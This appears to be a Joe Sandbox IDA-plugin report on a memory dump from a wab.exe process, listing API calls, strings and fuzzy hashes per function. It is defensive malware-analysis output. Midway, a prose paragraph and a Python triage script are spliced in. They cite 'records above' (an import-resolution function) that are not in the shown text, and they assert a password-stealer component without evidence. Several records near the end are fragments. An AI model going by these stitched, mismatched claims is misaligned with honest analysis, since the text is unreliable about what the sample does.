                      • API ID: memset
                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                      • API String ID: 2221118986-1606337402
                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                      • String ID:
                      • API String ID: 265355444-0
                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                      APIs
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                        • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                        • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                        • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                      • memset.MSVCRT ref: 0040C439
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                      • _wcsupr.MSVCRT ref: 0040C481
                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                        • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                        • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                      • memset.MSVCRT ref: 0040C4D0
                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                      • String ID:
                      • API String ID: 1973883786-0
                      • Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                      • Opcode Fuzzy Hash: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
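The two records above that matter most for triage are the import-resolution function (GetSystemDirectoryW, LoadLibraryW, five GetProcAddress calls, string advapi32.dll) and the registry walker (RegOpenKeyExW on HKLM Shell Folders, then a RegEnumValueW loop). Reading hundreds of these blocks by hand is slow, so the following is an added example, not code from Joe Sandbox or from the sample: a small parser for the IDA-plugin record format shown on this page, plus a capability tagger that runs over the parsed call lists. The capability table, the HKEY decoding and the "first non-hex argument is lpSubKey" heuristic are this example's own assumptions (the plugin prints the stack at the call site, not a clean parameter list); the embedded sample is excerpted from the two records above with most metadata lines dropped.

```python
"""Parse Joe Sandbox IDA-plugin function records ("APIs / Strings / Memory Dump
Source / Similarity" blocks) and tag each function with the Win32 capability
its call list implies.  Added triage example; not Joe Sandbox tooling."""
import re
from dataclasses import dataclass, field

# Excerpted from the two report records above (metadata trimmed) so the
# parser runs offline.
SAMPLE = r"""
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
Strings
Memory Dump Source
• Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
• Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
APIs
  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
• Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
• String ID:
• Opcode ID: 7b1cc3e9e28870269e7e0e76d5f0a110d3188fcb9cf6d5cab2ec752ccc6f38bd
• Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
STR_RE = re.compile(r"^•\s*(?P<text>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)"          # e.g. ??3@YAXPAX@Z.MSVCRT
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
KV_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")

# Assumed capability table (this example's, not a Joe Sandbox definition):
# a record gets a tag only when every listed API is present.
CAPABILITIES = {
    "dynamic-import-resolution": {"LoadLibraryW", "GetProcAddress"},
    "registry-enumeration": {"RegOpenKeyExW", "RegEnumValueW"},
    "file-read": {"CreateFileW", "ReadFile"},
}
HKEY = {"80000001": "HKEY_CURRENT_USER", "80000002": "HKEY_LOCAL_MACHINE"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: str = ""          # address of the callee when "Part of subcall function"


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)   # (text, xref)
    meta: dict = field(default_factory=dict)      # API ID, String ID, hashes, ...

    def api_names(self):
        return {c.name for c in self.apis}


def parse_records(text):
    """Split the plugin output into records; 'Instruction Fuzzy Hash' closes one."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in HEADERS:
            continue
        if m := STR_RE.match(line):
            cur.strings.append((m["text"], m["ref"]))
        elif m := API_RE.match(line):
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"] or ""))
        elif m := KV_RE.match(line):
            cur.meta[m["key"]] = m["val"]
            if m["key"] == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
        else:
            raise ValueError(f"unrecognised line: {line!r}")
    if cur.apis or cur.strings or cur.meta:   # tolerate a truncated last record
        records.append(cur)
    return records


def classify(rec):
    names = rec.api_names()
    return sorted(cap for cap, need in CAPABILITIES.items() if need <= names)


def registry_targets(rec):
    """(root, subkey) for each RegOpenKeyExW.  Heuristic: the plugin dumps the
    stack at the call, so hKey is taken as args[0] and lpSubKey as the first
    argument that is neither '?' nor an 8-digit hex value."""
    out = []
    for c in rec.apis:
        if c.name != "RegOpenKeyExW":
            continue
        root = HKEY.get(c.args[0], c.args[0]) if c.args else "?"
        sub = next((a for a in c.args if a != "?" and not re.fullmatch(r"[0-9A-F]{8}", a)), None)
        out.append((root, sub))
    return out


def triage(text):
    return [(r.meta.get("String ID", ""), classify(r), registry_targets(r))
            for r in parse_records(text)]


if __name__ == "__main__":
    for string_id, caps, regs in triage(SAMPLE):
        print(f"strings={string_id!r:16} caps={caps} registry={regs}")
```

Run against the full report text, the same loop surfaces every function that both resolves imports at runtime and reaches a credential-bearing location (Shell Folders is how the embedded password-recovery code finds profile directories), which is a far faster way to locate the stealer component inside the wab.exe memory dump than scrolling the fuzzy-hash records.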
                      APIs
                      • memset.MSVCRT ref: 004116FF
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                        • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                        • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                        • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                      • API String ID: 2618321458-3614832568
                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                      APIs
                      • memset.MSVCRT ref: 004185FC
                      • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                      • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@AttributesFilememset
                      • String ID:
                      • API String ID: 776155459-0
                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                      • malloc.MSVCRT ref: 00417524
                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                      • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                      • String ID:
                      • API String ID: 2308052813-0
                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                      APIs
                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                      • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: PathTemp$??3@
                      • String ID: %s\etilqs_$etilqs_
                      • API String ID: 1589464350-1420421710
                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                      APIs
                      • memset.MSVCRT ref: 0040FDD5
                        • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                      • _snwprintf.MSVCRT ref: 0040FE1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                      • String ID: <%s>%s</%s>$</item>$<item>
                      • API String ID: 1775345501-2769808009
                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                      APIs
                      • wcscpy.MSVCRT ref: 0041477F
                      • wcscpy.MSVCRT ref: 0041479A
                      • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                      • CloseHandle.KERNEL32(00000000), ref: 004147C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscpy$CloseCreateFileHandle
                      • String ID: General
                      • API String ID: 999786162-26480598
                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ErrorLastMessage_snwprintf
                      • String ID: Error$Error %d: %s
                      • API String ID: 313946961-1552265934
                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID: foreign key constraint failed$new$oid$old
                      • API String ID: 0-1953309616
                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                      APIs
                      Strings
                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                      • API String ID: 3510742995-272990098
                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: gj
                      • API String ID: 1297977491-4203073231
                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                      APIs
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                      • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                        • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                      • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                      APIs
                      • AreFileApisANSI.KERNEL32 ref: 00417497
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                      • malloc.MSVCRT ref: 004174BD
                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                      • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                      • String ID:
                      • API String ID: 2903831945-0
                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                      APIs
                      • GetParent.USER32(?), ref: 0040D453
                      • GetWindowRect.USER32(?,?), ref: 0040D460
                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Window$Rect$ClientParentPoints
                      • String ID:
                      • API String ID: 4247780290-0
                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                      APIs
                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                      • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                      • memset.MSVCRT ref: 004450CD
                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                      • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                        • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                      • String ID:
                      • API String ID: 1471605966-0
                      • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                      • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                      APIs
                      • wcscpy.MSVCRT ref: 0044475F
                      • wcscat.MSVCRT ref: 0044476E
                      • wcscat.MSVCRT ref: 0044477F
                      • wcscat.MSVCRT ref: 0044478E
                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                        • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                      Strings
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                      • String ID: \StringFileInfo\
                      • API String ID: 102104167-2245444037
                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                      APIs
                      Memory Dump Source
                      • Source File: 00000014.00000002.1807424206.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_20_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      Similarity
                      • API ID: memcpy$??3@
                      • String ID: g4@
                      Similarity
                      • API ID: _memicmpwcslen
                      • String ID: @@@@$History
                      APIs
                      • memset.MSVCRT ref: 004100FB
                      • memset.MSVCRT ref: 00410112
                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                      • _snwprintf.MSVCRT ref: 00410141
                      Similarity
                      • API ID: memset$_snwprintf_wcslwrwcscpy
                      • String ID: </%s>
                      APIs
                      • memset.MSVCRT ref: 0040D58D
                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                      Similarity
                      • API ID: ChildEnumTextWindowWindowsmemset
                      • String ID: caption
                      APIs
                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
